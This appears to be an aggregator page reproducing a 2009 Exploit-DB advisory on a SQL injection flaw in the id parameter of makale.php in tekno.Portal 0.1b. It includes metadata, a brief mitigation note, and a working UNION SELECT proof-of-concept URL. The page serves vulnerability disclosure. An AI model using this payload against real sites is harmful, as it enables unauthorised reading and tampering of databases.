tekno.Portal v 0.1b (makale.php id) SQL Injection Vulnerability

vendor:

tekno.Portal

by:

CoBRa_21

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: tekno.Portal

Affected Version From: 0.1b

Affected Version To: 0.1b

Patch Exists: NO

Related CWE: N/A

CPE: a:teknoportal:tekno.portal:0.1b

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

tekno.Portal v 0.1b (makale.php id) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The request contains a malicious SQL statement that when executed, can disclose sensitive information from the database, modify data, or even delete data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------

tekno.Portal v 0.1b (makale.php id) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu@windowslive.com
 
Script Name: tekno.Portal v 0.1b
 
Download: http://sourceforge.net/projects/teknoportal/
 
-------------------------------------------------------------------------------------------
 
Exploit:
 
http://localhost/teknoportal/makale.php?id=-1+union+select+0,1,version(),3,4,5,6,7
 
-------------------------------------------------------------------------------------------

Her&#351;ey Vatan &#304;çin;